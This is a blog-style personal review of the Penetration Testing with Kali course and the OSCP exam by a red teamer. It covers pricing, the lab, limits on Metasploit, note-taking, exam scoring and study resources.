There may be an overwhelming amount of information available to those considering or attempting to pass the Offensive Security Certified Professional exam, but it is still a very common question among our readers and Twitter followers. Due to the continued interest, here are my 2 cents on the Penetration Testing with Kali course and subsequent OSCP exam. I’ll try to keep this as brief and as informative as possible.
I am a life long autodidact with a deep interest in all things digital, especially the manipulation of remote systems and information. Military experience aside, my professional roles have included web/API development in both PHP and Python, vulnerability research (binary exploitation), C development (device communication), and my current work as a full time Red Teamer. OSCP is my first certification despite working in the industry for 5+ years.
Note: You can absolutely break into the industry without any certifications, but given the opportunity, the right certificate can advance your career or help move you into a more appropriate position for your skill level or interest.
The Penetration Testing with Kali course comes with a complete set of instructional videos along with a lab manual for navigating the virtual penetration testing lab. Courses start weekly, but you may have to wait a few weeks for an opening slot based on current demand. The course material is not available until the start date, so if you are looking for some good preparation material, see the resources section below.
The PWK course and OSCP exam are not cheap, and starts out at $800 US for 30 days of lab access. Lab extensions are always available after your initial time period has expired as well. When going through the course, I opted for the 60 day option. This was an ample amount of time to complete 90%+ of the Lab machines. The pricing is well documented and subject to change. For a full list of options, check out the OSCP Pricing Page.
The lab is where the course really shines. There are enough targets (~40-50) that it will introduce even the most novice of students to a large number of common services and misconfigurations. You will be required to conduct reconnaissance, enumeration, course exploitation, and post-exploitation on an assortment of server and client based systems.
The lab manual is there for a reason, and covers many topics that are not included in the video resources. I highly recommend that you take the time to go through the lab book prior launching all the things inside of the lab.
PWK comes with a custom version of Kali for use in the lab and on the exam. Despite the temptation to have bleeding edge tools, resist the urge to update your system. This is generally bad practice and leads to exposure of vulnerabilities on your system, but for the purposes of the course only I’d recommend not updating Kali. There are some arcane bugs that may surface with updated packages. I did opt to use the latest versions of specific tools, namely nikto and nmap.
Get used to not using Metasploit in the lab. You are only allowed to use it on one machine during the exam. By all means, get familiar with Metasploit and Meterpreter features, but ensure that you don’t end up relying on tools for exploitation. Find public exploits and modify them for your use. Learn to port exploits to the language of your choice. You will learn much more by getting intricately familiar with WHY a vulnerability exists and HOW it actually works.
Use the forums. Don’t use the forums until you get stuck. The forums are a great resource, especially for some of the more CTF style targets. CTFs are notorious for forcing you to follow the challenge writer’s logic in solving challenges as opposed to enforcing sound enumeration techniques. Don’t be afraid to use the forums, the mods are great at killing any spoilers, but that vague comment may just be what you need to pop a remote shell.
Take time while you’re in the lab to improve on your programming skills. You will learn some bash scripting and basic Python in the course. The more that you are able to automate and understand in a language, the better off you will be. You will learn how to exploit stack based buffer overflows. Learn this process front and back from identification of a buffer overflow vector to code execution. You don’t need to be fancy with exploit mitigation bypasses, but you will need to write at least one custom exploit for the exam. If you are intimately familiar with the process, this will be the easiest 25 points on the exam.
Work on your weakness. Take full advantage of your lab time. If you are primarily used to targeting Windows, then focus on the Linux machines. If you are weak on Windows privilege escalation, then you have plenty of opportunity to test various methods on the Windows machines. Always start with misconfigurations before launching random exploits. Launching the wrong binary may result in an unresponsive or unstable machine.
Take outstanding notes. Documentation is the bane of every Red Teamer’s and Penetration Tester’s existence, but it is absolutely critical. Use the lab to develop a note taking methodology that works for you. I highly recommend a tool called Typora. It is a Markdown editor and viewer that just works and includes in-line images, charts, highlighting, and much more. The in-line image handling is perfect for presenting screenshots throughout all phases of testing on both the lab and on the exam. By taking proper notes, your report will practically be done before you start writing it.
Yes, we all know that the constant mantra of OSCP graduates and students alike is
Try Harder. I’m here to tell you that you need to
Try Easier, at least initially. OSCP is very much an entry level (albeit hands on) certification. Find a new service? Try the default passwords, try anonymous access and guest accounts. Attempt simple escape sequences and look for errors or anomalies. Only after you have tested the common sense and ridiculous should you move forward to the
Try harder phase.
The key to success is realizing the information that you possess and how it can be used to get you one step closer to the target. You will be chaining a lot of small vulnerabilities together resulting in full system compromise.
The exam is in depth and hands on. You will be asked to apply all of the skills that you gained through the videos, lab manual, exercises, and lab machines in a 24 hour Penetration Test simulation. Upon completion of the hands on portion, you will be given an additional 24 hours to write a full Penetration Testing report. You will be given 5 specific targets with varying point values. The maximum points on the exam are 100, and you must receive at least 70⁄100 to pass.
Make sure you take the required screenshots and submit the proof files accordingly!!!
Extra credit is available, and requires that you also submit a Penetration Testing report for the lab. The report must include the details of at least 10 fully compromised and unique lab machines. You must also submit proof of work for all lab book exercises. I highly recommend doing the extra credit, the hands on time of report writing and finishing the exercises will only reinforce the fundamentals presented throughout the course.
Remember that while you have the additional 24 hours for report writing, you will NOT have access to the exam network after the exam time expires. If you missed some screenshots or forgot to submit proof through the web interface, and you are out of luck. You can pay an extra $60 to take the exam again in a week (or longer if you want more lab time).
- Don’t quit
- Try easier
- Then try harder
- Document everything as you go
- Take a step back and assess what you have and where you are going
- Take breaks
Videos and Training
- Hacking: The art of exploitation
- The Hacker’s Playbook 2
- Black Hat Python
- Red Team Field Manual
- Penetration Testing: A Hands-On Introduction to Hacking
- OSCP Total Guide
- Basic Linux Privilege Escalation
- Windows Privilege Escalation
- Linux Privilege Escalation Scripts
- TTY Shell Upgrades
- Reverse Shell Cheatsheet